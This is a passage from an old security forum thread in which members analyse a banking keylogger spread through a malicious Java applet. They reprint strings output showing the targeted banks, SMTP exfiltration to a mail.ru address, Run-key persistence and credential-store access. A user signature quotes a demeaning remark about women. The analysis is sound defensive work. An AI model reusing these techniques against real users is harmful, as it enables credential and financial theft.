Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17

Thread: owned as we speak

  1. #11
    HeadShot Master N1nja Cybr1d's Avatar
    Join Date
    Jul 2003
    Location
    Boston, MA
    Posts
    1,840
    Hmm...i am able to download them but the Av will autmatically pick it up. I could ignore the AV but i'm at my work place right now and I dont want to jeopardise any of the computers here. I'll wait until I get home on my Lab pcs. Thank you very much. That was exactly what I was looking for.

    Cheers,

  2. #12
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323
    From FD on this attachment:

    From the source of that page:

    APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1

    BlackBox.class is detected immediately by my virusscanner as ClassLoader/E, more info:
    http://www.viruslibrary.com/virusinf...lassLoader.htm

    The javautil.zip appears to be an exe file renamed to zip. The exe is compressed with FSG.

    Interresting pieces of output from strings on the decompressed exe:


    ----------------------------------------------BEGIN
    HookerDll.Dll
    Install
    Uninstall
    EDIT
    %s\%s
    WVS3
    \kgn.txt
    Hooker.dll
    Install
    Uninstall
    Westpac
    bendigo
    Bendigo
    e-bendigo
    e-Bendigo
    commbank
    Commonwealth
    NetBank
    Citibank
    Bank of America
    e-gold
    e-bullion
    e-Bullion
    evocash
    EVOCash
    EVOcash
    intgold
    INTGold
    paypal
    PayPal
    bankwest
    Bank West
    BankWest
    National Internet Banking
    cibc
    CIBC
    scotiabank
    ScotiaBank
    Scotia Bank
    bank of montreal
    Bank of Montreal
    royalbank
    Royal Bank
    RoyalBank
    tdwaterhouse
    TD Canada Trust
    TD Waterhouse
    president's choice
    President's Choice
    President Choice
    suncorpmetway
    Suncorp
    macquarie
    Macquarie
    INTgold
    1mdc
    1MDC
    TD Waterhouse
    goldmoney
    GoldMoney
    goldgrams
    pecunix
    Pecunix
    Pecun!x
    hyperwallet
    HyperWallet
    Wells Fargo
    Bank One
    Banesto
    CAIXA
    SunTrust
    Sun Trust
    Discover Card
    Washington Mutual
    Wachovia
    desjardins
    Chase
    0+060F0
    1$11161J1U1i1
    2.2I2\2
    3'3,3E3c3h3r3
    4%42484>4D4J4P4V4\4b4h4n4t4z4
    DATA
    EHLO localhost
    Subject: KeyLog from (%s)
    MAIL FROM:<pentasatan@mail.ru>
    RCPT TO:<pentasatan@mail.ru>
    SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    open
    pstorec.dll
    PStoreCreateInstance
    internet explorer
    http://
    wininetcachecredentials
    Cookie:
    ----------------------------------------------END
    I believe a good "strings" will give you these results.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  3. #13
    < joke >-sits here, blinking- I always miss out on all the fun, being on a Linux system. < /joke >

  4. #14
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323
    Oh pooh, you don't have to miss anything. Heck, half the fun of being on a *nix system is the ability to touch and play with this stuff. Why else would the *nix gods give us strings to play with?
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  5. #15
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    for any interested javautil is packed using fsg which can be found at illmob:

    http://illmob.com/stuff/fsg.zip

    and must be uncompressed using it before strings can be run against it.

    although strings was originally a unix util there are many windows ports around a windows version can be had from:

    http://members.cox.net/dos/unix.htm

    heres the results of strings run against blackbox.class:

    BlackBox
    java/applet/Applet
    UCL_def
    Magic_def
    stop
    Code
    LineNumberTable
    this
    Synthetic
    <init>
    Dummy
    VerifierBug
    getClass
    ()Ljava/lang/Class;
    java/lang/Object
    dummy_class
    Ljava/lang/Class;
    UCL_definition
    Magic
    myDefineClass
    )(Ljava/lang/String;[BII)Ljava/lang/Class;
    newInstance
    ()Ljava/lang/Object;
    java/lang/Class
    com.ms.security.PermissionSet
    forName
    %(Ljava/lang/String;)Ljava/lang/Class;
    doit
    getMethod
    @(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
    !com/ms/security/PermissionDataSet
    setFullyTrusted
    (Z)V
    com/ms/security/PermissionSet
    &(Lcom/ms/security/PermissionDataSet;)V
    getClassLoader
    ()Ljava/lang/ClassLoader;
    com/ms/vm/loader/URLClassLoader
    value
    !Lcom/ms/vm/loader/URLClassLoader;
    invoke
    9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
    java/lang/reflect/Method
    Worker
    loadClass
    java/lang/Throwable
    SourceFile
    BlackBox.java
    R: +
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  6. #16
    Senior Member deftones12's Avatar
    Join Date
    Jan 2003
    Location
    cali forn i a
    Posts
    333
    i dont see visa on that list ms. mittens guess i'm safe heh

  7. #17
    The only way to be safe these days, is not to be online it seems.
    But still it is pretty funny how these sort of Virus's (If you can call them that) seem to keep popping up time after time.

    cheers
    .:front2back:.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •